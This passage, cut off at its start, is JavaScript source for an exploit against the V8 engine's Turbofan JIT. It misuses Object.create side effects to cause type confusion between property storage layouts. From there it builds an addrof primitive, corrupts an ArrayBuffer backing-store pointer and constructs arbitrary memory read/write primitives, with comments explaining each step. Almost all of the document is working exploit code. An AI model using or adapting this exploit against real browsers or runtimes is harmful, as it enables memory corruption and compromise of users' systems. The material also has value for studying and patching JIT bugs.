    let floatView = new Float64Array(1);
    let uint64View = new BigUint64Array(floatView.buffer);
    let uint8View = new Uint8Array(floatView.buffer);

    // Feature request: unboxed BigInt properties so these aren't needed =)
    Number.prototype.toBigInt = function toBigInt() {
        floatView[0] = this;
        return uint64View[0];
    };

    BigInt.prototype.toNumber = function toNumber() {
        uint64View[0] = this;
        return floatView[0];
    };
}

// Garbage collection is required to move objects to a stable position in
// memory (OldSpace) before leaking their addresses.
function gc() {
    for (let i = 0; i < 100; i++) {
        new ArrayBuffer(0x100000);
    }
}

const NUM_PROPERTIES = 32;
const MAX_ITERATIONS = 100000;

function checkVuln() {
    function hax(o) {
        // Force a CheckMaps node before the property access. This must
        // load an inline property here so the out-of-line properties
        // pointer cannot be reused later.
        o.inline;

        // Turbofan assumes that the JSCreateObject operation is
        // side-effect free (it has the kNoWrite property). However, if the
        // prototype object (o in this case) is not a constant, then
        // JSCreateObject will be lowered to a runtime call to
        // CreateObjectWithoutProperties. This in turn eventually calls
        // JSObject::OptimizeAsPrototype which will modify the prototype
        // object and assign it a new Map. In particular, it will
        // transition the OOL property storage to dictionary mode.
        Object.create(o);

        // The CheckMaps node for this property access will be incorrectly
        // removed. The JIT code is now accessing a NameDictionary but
        // believes its loading from a FixedArray.
        return o.outOfLine;
    }

    for (let i = 0; i < MAX_ITERATIONS; i++) {
        let o = {inline: 0x1337};
        o.outOfLine = 0x1338;
        let r = hax(o);
        if (r !== 0x1338) {
            return;
        }
    }

    throw "Not vulnerable"
};

// Make an object with one inline and numerous out-of-line properties.
function makeObj(propertyValues) {
    let o = {inline: 0x1337};
    for (let i = 0; i < NUM_PROPERTIES; i++) {
        Object.defineProperty(o, 'p' + i, {
            writable: true,
            value: propertyValues[i]
        });
    }
    return o;
}

//
// The 3 exploit primitives.
//

// Find a pair (p1, p2) of properties such that p1 is stored at the same
// offset in the FixedArray as p2 is in the NameDictionary.
let p1, p2;
function findOverlappingProperties() {
    let propertyNames = [];
    for (let i = 0; i < NUM_PROPERTIES; i++) {
        propertyNames[i] = 'p' + i;
    }
    eval(`
        function hax(o) {
            o.inline;
            this.Object.create(o);
            ${propertyNames.map((p) => `let ${p} = o.${p};`).join('\n')}
            return [${propertyNames.join(', ')}];
        }
    `);

    let propertyValues = [];
    for (let i = 1; i < NUM_PROPERTIES; i++) {
        // There are some unrelated, small-valued SMIs in the dictionary.
        // However they are all positive, so use negative SMIs. Don't use
        // -0 though, that would be represented as a double...
        propertyValues[i] = -i;
    }

    for (let i = 0; i < MAX_ITERATIONS; i++) {
        let r = hax(makeObj(propertyValues));
        for (let i = 1; i < r.length; i++) {
            // Properties that overlap with themselves cannot be used.
            if (i !== -r[i] && r[i] < 0 && r[i] > -NUM_PROPERTIES) {
                [p1, p2] = [i, -r[i]];
                return;
            }
        }
    }

    throw "Failed to find overlapping properties";
}

// Return the address of the given object as BigInt.
function addrof(obj) {
    // Confuse an object with an unboxed double property with an object
    // with a pointer property.
    eval(`
        function hax(o) {
            o.inline;
            this.Object.create(o);
            return o.p${p1}.x1;
        }
    `);

    let propertyValues = [];
    // Property p1 should have the same Map as the one used in
    // corrupt for simplicity.
    propertyValues[p1] = {x1: 13.37, x2: 13.38};
    propertyValues[p2] = {y1: obj};

    for (let i = 0; i < MAX_ITERATIONS; i++) {
        let res = hax(makeObj(propertyValues));
        if (res !== 13.37) {
            // Adjust for the LSB being set due to pointer tagging.
            return res.toBigInt() - 1n;
        }
    }

    throw "Addrof failed";
}

// Corrupt the backingStore pointer of an ArrayBuffer object and return the
// original address so the ArrayBuffer can later be repaired.
function corrupt(victim, newValue) {
    eval(`
        function hax(o) {
            o.inline;
            this.Object.create(o);
            let orig = o.p${p1}.x2;
            o.p${p1}.x2 = ${newValue.toNumber()};
            return orig;
        }
    `);

    let propertyValues = [];
    // x2 overlaps with the backingStore pointer of the ArrayBuffer.
    let o = {x1: 13.37, x2: 13.38};
    propertyValues[p1] = o;
    propertyValues[p2] = victim;

    for (let i = 0; i < MAX_ITERATIONS; i++) {
        o.x2 = 13.38;
        let r = hax(makeObj(propertyValues));
        if (r !== 13.38) {
            return r.toBigInt();
        }
    }

    throw "CorruptArrayBuffer failed";
}

function pwn() {
    //
    // Step 0: verify that the engine is vulnerable.
    //
    checkVuln();
    print("[+] v8 version is vulnerable");

    //
    // Step 1. determine a pair of overlapping properties.
    //
    findOverlappingProperties();
    print(`[+] Properties p${p1} and p${p2} overlap`);

    //
    // Step 2. leak the address of an ArrayBuffer.
    //
    let memViewBuf = new ArrayBuffer(1024);
    let driverBuf = new ArrayBuffer(1024);

    // Move ArrayBuffer into old space before leaking its address.
    gc();

    let memViewBufAddr = addrof(memViewBuf);
    print(`[+] ArrayBuffer @ 0x${memViewBufAddr.toString(16)}`);

    //
    // Step 3. corrupt the backingStore pointer of another ArrayBuffer to
    // point to the first ArrayBuffer.
    //
    let origDriverBackingStorage = corrupt(driverBuf, memViewBufAddr);

    let driver = new BigUint64Array(driverBuf);
    let origMemViewBackingStorage = driver[4];

    //
    // Step 4. construct the memory read/write primitives.
    //
    let memory = {
        write(addr, bytes) {
            driver[4] = addr;
            let memview = new Uint8Array(memViewBuf);
            memview.set(bytes);
        },
        read(addr, len) {
            driver[4] = addr;
            let memview = new Uint8Array(memViewBuf);
            return memview.subarray(0, len);
        },
        read64(addr) {
            driver[4] = addr;
            let memview = new BigUint64Array(memViewBuf);
            return memview[0];
        },
        write64(addr, ptr) {
            driver[4] = addr;
            let memview = new BigUint64Array(memViewBuf);
            memview[0] = ptr;
        },
        addrof(obj) {
            memViewBuf.leakMe = obj;
            let props = this.read64(memViewBufAddr + 8n);
            return this.read64(props + 15n) - 1n;
        },
        fixup() {
            let driverBufAddr = this.addrof(driverBuf);
            this.write64(driverBufAddr + 32n, origDriverBackingStorage);
            this.write64(memViewBufAddr + 32n, origMemViewBackingStorage);
        },
    };

    print("[+] Constructed memory read/write primitive");

    // Read from and write to arbitrary addresses now :)
    memory.write64(0x41414141n, 0x42424242n);

    // All done here, repair the corrupted objects.
    memory.fixup();

    // Verify everything is stable.
    gc();
}

if (typeof(window) === 'undefined')
    pwn();